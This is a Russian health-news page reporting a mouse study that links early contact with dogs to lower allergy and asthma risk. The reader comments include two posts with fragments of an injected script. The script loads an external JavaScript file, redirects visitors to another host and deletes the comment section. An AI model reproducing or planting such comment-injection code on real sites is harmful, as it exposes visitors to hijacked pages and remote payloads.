Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Домашние собаки не дадут ...  >>  Домашние собаки не дадут ребенку стать аллергиком
 
Обратная связь
 

Домашние собаки не дадут ребенку стать аллергиком

Размер шрифта
16 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что ранний контакт ребенка с собакой, снижает риск развития у него аллергии и астмы в будущем.

 

Исследование было проведено совместными силами двух американских университетов: Калифорнийского университета в Сан-Франциско и Мичиганского университета. Ведущими авторами стали доктора Сьюзан Линч и Николас Лукас.

Эксперты провели серию экспериментов на лабораторных мышах. Последних подвергали воздействию пыли из тех домов, в которых собаке разрешено гулять внутри помещения. Оказалось, что эта пыль может изменять состав кишечной микрофлоры мышей, а также снижать чрезмерную активность ииммунной системы.

В ходе выполнения эксперименты ученые подвергали мышей воздействию самых различных антигенов, включая, например, компоненты оболочки таракана. Обнаружилось, что интенсивность астма-подобных воспалительных процессов была значительно снижена в дыхательных путях тех мышей, которые контактировали с «собачьей пылью».

В кишках этих животных была обнаружена особая бактерия – Lactobacullusjohnsonii (Лактобациллы Джонсона). Ученые попробовали добавить культуру этих микробов в мышиный корм и получили замечательный результат – выраженное снижение частоты воспалительных реакций в ответ на действие аллергенов и даже профилактический эффект в отношении инфекции, вызываемой респираторно-синцитиальным вирусом (РС-вирус). Последний является одним из факторов, предрасполагающих к развитию бронхиальной астмы у детей.

При этом вышеописанный защитный эффект был более выраженным в том случае, когда мыши контактировали с полным спектром микробов, содержащихся в пыли из домов любителей собак, а не только с лактобациллами Джонсона. Этот факт указывает на потенциально значимое влияние каких-то других микробов.

Так или иначе, ученые надеются, что однажды воздействие на кишечную микрофлору с целью профилактики (а возможно, и лечения) аллергических реакций в дыхательных путях станет рутинной клинической практикой.

Так что не препятствуйте контакту малыша с вашей собакой – возможно, что именно она спасет его от астмы.

Хотите стать идеальной мамой? Прочтите материалы нашего специального проекта «Ребенок будет», и у вас это обязательно получится!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:51

Комментарий удален за нарушение Правил общения

2 - pomk93

06 июня 2014 в 09:51

Комментарий удален за нарушение Правил общения

3 - pomk93

06 июня 2014 в 09:51

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучше всего грудное   Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Как выглядит аллергия
Можно ли защитить ребенка от микробов
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.